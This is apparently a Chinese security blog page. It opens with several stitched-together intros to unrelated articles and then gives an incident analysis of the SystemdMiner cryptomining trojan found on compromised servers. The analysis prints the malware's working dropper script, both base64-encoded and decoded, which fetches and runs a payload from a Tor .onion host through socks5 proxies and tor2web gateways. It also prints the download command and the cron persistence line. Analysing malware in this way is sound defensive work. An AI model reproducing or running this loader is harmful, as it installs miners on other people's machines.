这是一篇关于CodeQL的文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建于2020年6月6日,最近一次更新时间为2022年3月23日。本文会不定期更新。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。
关于什么是CodeQL?更多详细内容见官网。
这是一篇统计2023年高危漏洞列表的文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建时间为2023年1月1日,最近一次更新时间为2023年1月15日。本文会不定期更新。打钩的漏洞说明已经拥有完整的利用程序,或尽可能的对其进行了漏洞分析。相关分析文章可能不会在第一时间公开。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。
格式:出现时间#CVE编号-漏洞名称
这是一篇统计2021年H.y.v漏洞列表的文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建时间为2021年5月5日,最近一次更新时间为2021年5月5日。本文会不定期更新。有详情的漏洞说明已经拥有完整的利用程序,或尽可能的对其进行了漏洞分析。相关分析文章可能不会在第一时间公开。感兴趣的朋友可以联系下列地址获取漏洞详情:R2l0MGUwd0AxNjMuY29t。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。
这是一篇统计2021年高危漏洞列表的文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建时间为2021年1月1日,最近一次更新时间为2021年10月1日。本文会不定期更新。打钩的漏洞说明已经拥有完整的利用程序,或尽可能的对其进行了漏洞分析。相关分析文章可能不会在第一时间公开。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。
格式:出现时间#CVE编号-漏洞名称
这是一篇关于Docker相关内容的文章。由于作者能力有限,文中难免会出现一些错误,请谅解。本文创建时间为2020年6月6日,最近一次更新时间为2020年9月15日。本文会不定期更新。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。
关于什么Docker?更多详细内容见 Docker官网。
Docker 是一个开源的应用容器引擎,基于 Go 语言 并遵从 Apache2.0 协议开源。Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中,然后发布到任何流行的 Linux 机器上,也可以实现虚拟化。 容器是完全使用沙箱机制,相互之间不会有任何接口(类似 iPhone 的 app),更重要的是容器性能开销极低。
这是一篇关于SystemdMiner木马挖矿事件分析的文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建时间为2020年6月18日,最近一次更新时间为2020年9月15日。本文会不定期更新。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。
2020年6月16日接到消息,大量机器被挖矿。根据相关的信息,发现为SystemdMiner病毒。
ls -la
发现ryukd.sh文件时间被修改过,修改成了2015年或2017年。
-rwxr-xr-x. 1 root root 1468 Aug 12 2017 .ryukd.sh
cat .ryukd.sh
[root@192 ~]# cat .ryukd.sh
#!/bin/bash
exec &>/dev/null
echo CgRvlui+rPkiCq7fgarZne3aI54Cz71ugd8nPMnGeugoxg/gRZFBAwgxztGqF7xE
echo Q2dSdmx1aStyUGtpQ3E3ZmdhclpuZTNhSTU0Q3o3MXVnZDhuUE1uR2V1Z294Zy9nUlpGQkF3Z3h6dEdxRjd4RQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJyeXVrZHNzdXNrb3ZobndiIikKCnNvY2t6KCkgewpuPShkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgdW5jZW5zb3JlZC5hbnkuZG5zLm5peG5ldC54eXopCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTUpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xzb3J0IC11UnxoZWFkIC0xKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAkZCAvdG1wIC92YXIvdG1wIC9kZXYvc2htIC91c3IvYmluIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmZXhlCmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IHx8ICRjICQxJGYgLW8keApjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuY2ggdG9yMndlYi5pbyB0b3Iyd2ViLnRvIHRvcjJ3ZWIuc3UKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDApL3N0YXR1czsgdGhlbgp1ICR0LiRoCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash
解密之后
CgRvlui+rPkiCq7fgarZne3aI54Cz71ugd8nPMnGeugoxg/gRZFBAwgxztGqF7xE
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "ryukdssuskovhnwb")
sockz() {
n=(dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org uncensored.any.dns.nixnet.xyz)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%5))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|sort -uR|head -1)
}
fexe() {
for i in $d /tmp /var/tmp /dev/shm /usr/bin ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
u() {
sockz
fexe
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
$c -x socks5h://$s:9050 $t.onion$f -o$x || $c $1$f -o$x
chmod +x $x;$x;rm -f $x
}
for h in tor2web.in tor2web.ch tor2web.io tor2web.to tor2web.su
do
if ! ls /proc/$(head -1 /tmp/.X11-unix/00)/status; then
u $t.$h
else
break
fi
done
通过程序自带的socks5代理,下载暗网中ryukdssuskovhnwb.onion/int.x86_64文件。
curl -4fsSLkA- -m200 -x socks5h://165.22.117.234:9050 ryukdssuskovhnwb.onion/int.x86_64 -o./d24e930116b812dc7ca9c410a615fe53
#https://0e0w.com/upload/SystemdMiner-ioc.7z
暂时无分析d24e930116b812dc7ca9c410a615fe53的能力与精力。后续待进行。
其他的bash
sh -c echo Q2dSdmx1aStyUGtpQ3E3ZmdhclpuZTNhSTU0Q3o3MXVnZDhuUE1uR2V1Z294Zy9nUlpGQkF3Z3h6dEdxRjd4RQpjaGF0dHIgLWkgL3RtcC8uWDExLXVuaXgKY2hhdHRyIC1SaSAvdG1wLy5YMTEtdW5peApbIC1mIC90bXAvLlgxMS11bml4IF0gJiYgcm0gLWYgL3RtcC8uWDExLXVuaXggClsgLWQgL3RtcC8uWDExLXVuaXggXSB8fCBta2RpciAtcCAvdG1wLy5YMTEtdW5peAo=|base64 -d|bash
CgRvlui+rPkiCq7fgarZne3aI54Cz71ugd8nPMnGeugoxg/gRZFBAwgxztGqF7xE
chattr -i /tmp/.X11-unix
chattr -Ri /tmp/.X11-unix
[ -f /tmp/.X11-unix ] && rm -f /tmp/.X11-unix
[ -d /tmp/.X11-unix ] || mkdir -p /tmp/.X11-unix
crontab -l
每小时的14分钟执行定时任务,> /dev/null 2>&1 &不记录定时任务的日志。
14 * * * * /root/.ryukd.sh > /dev/null 2>&1 &
SSH爆破
cd /var/log && cat secure | grep "Accepted" && cat secure | grep "Failed"
Hadoop RCE
Redis RCE
由于未找到Hadoop的访问日志,SSH登录的日志又太多。相关爆破的情况很多,暂时无法判断具体是如何入侵的。